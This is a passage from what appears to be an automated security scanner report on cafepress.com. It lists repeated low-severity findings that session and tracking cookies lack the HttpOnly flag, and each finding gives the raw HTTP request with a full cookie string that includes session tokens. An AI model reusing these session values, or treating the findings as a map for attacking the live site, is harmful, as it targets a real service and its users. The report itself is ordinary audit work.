Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.33. http://www.cafepress.com/+sweatshirts-hoodies previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+sweatshirts-hoodies

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:58 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+sweatshirts-hoodies HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.34. http://www.cafepress.com/+thermos previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+thermos

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.35. http://www.cafepress.com/+underwear-panties previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+underwear-panties

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+underwear-panties HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.36. http://www.cafepress.com/+water-bottles previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+water-bottles

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:04 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.37. http://www.cafepress.com/+womens-tank-tops previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+womens-tank-tops

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:59 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+womens-tank-tops HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.38. http://www.cafepress.com/+womens-thongs previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+womens-thongs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+womens-thongs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.39. http://www.cafepress.com/+yoga-mats previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+yoga-mats

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:42 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+yoga-mats HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.40. http://www.cafepress.com/1/1/index1.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/1/1/index1.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slx_session=3fd981e9a190058ee83a397fe8f24ad83ebc6679; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/1/index1.html HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
